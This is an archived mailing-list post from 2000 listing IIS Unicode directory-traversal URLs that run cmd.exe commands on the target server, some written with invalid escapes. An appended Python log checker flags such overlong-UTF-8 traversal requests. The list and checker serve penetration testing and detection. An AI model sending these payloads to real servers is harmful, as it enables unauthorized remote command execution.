Penetration Testing mailing list archives
[PEN-TEST] IIS UNICODE Strings
From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Fri, 27 Oct 2000 13:35:43 -0700
I have been trying to track the various strings when I find them, and here is a list so far. I have tested many of these and found many to work on systems I am authorized to audit.

Initial reports seemed to indicate that this was predominately a foreign (non US English) web server problem, however I have found that there are many vulnerable US English servers. In initial tests I found one non-US web site and three US web sites vulnerable for a single client. That made me wonder how many internal file & print, exchange, sql, and other servers with IIS installed were vulnerable within the network. In my testing I have found a good number of internal US servers vulnerable as well. Certainly not the majority, but fairly well represented anyhow.

I suspect this is a partial list of UNICODE strings...

Happy Testing...

-mch

http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
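Added example, not part of the original post: a log-review check that flags request paths like the ones listed above by finding percent-encoded UTF-8 sequences that are overlong (a multi-byte form of a character that fits in fewer bytes) and paths that contain a `..` segment only after such sequences are collapsed. The function names, finding labels and sample request lines are constructed for illustration, and the lax decoding rule is an assumption about how a permissive decoder treats trailing bytes.

```python
import re
from urllib.parse import unquote_to_bytes

BAD_ESC = re.compile(r"%(?![0-9A-Fa-f]{2})")
# Smallest code point that legitimately needs an n-byte UTF-8 sequence.
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}

def seq_len(lead):
    """Length implied by a lead byte, including the obsolete 5/6-byte forms."""
    n = 8 - (lead ^ 0xFF).bit_length()      # number of leading 1 bits
    return n if 2 <= n <= 6 else 1

def inspect_path(target):
    """Return a sorted list of findings for one request target."""
    path = target.split("?", 1)[0]          # the query string is not a path
    findings = {"malformed-escape"} if BAD_ESC.search(path) else set()
    raw, out, i = unquote_to_bytes(path), [], 0
    while i < len(raw):
        n = seq_len(raw[i])
        if i + n > len(raw):
            n = 1                           # truncated sequence: keep the byte
        # Assumption: model a lax decoder that keeps the low 6 bits of each
        # trailing byte without checking that it is a continuation byte.
        cp = raw[i] & (0xFF >> (n + 1)) if n > 1 else raw[i]
        for b in raw[i + 1:i + n]:
            cp = (cp << 6) | (b & 0x3F)
        if n > 1 and cp < MIN_CP[n]:
            findings.add("overlong-utf8")
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += n
    # Treat both separators alike, then look for a parent-directory segment.
    if ".." in "".join(out).replace("\\", "/").split("/"):
        findings.add("traversal-after-decode")
    return sorted(findings)

# Constructed request lines; the encoded paths are taken from the post above.
SAMPLE = [
    r"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0",
    r"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0",
    r"GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0",
    r"GET /caf%c3%a9/menu.html HTTP/1.0",
]

def scan(lines):
    """Pair each request target with its findings."""
    return [(ln.split(" ")[1], inspect_path(ln.split(" ")[1])) for ln in lines]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A strict UTF-8 decoder rejects every overlong form, so any `overlong-utf8` finding in a request path is worth alerting on regardless of whether the collapsed path also traverses.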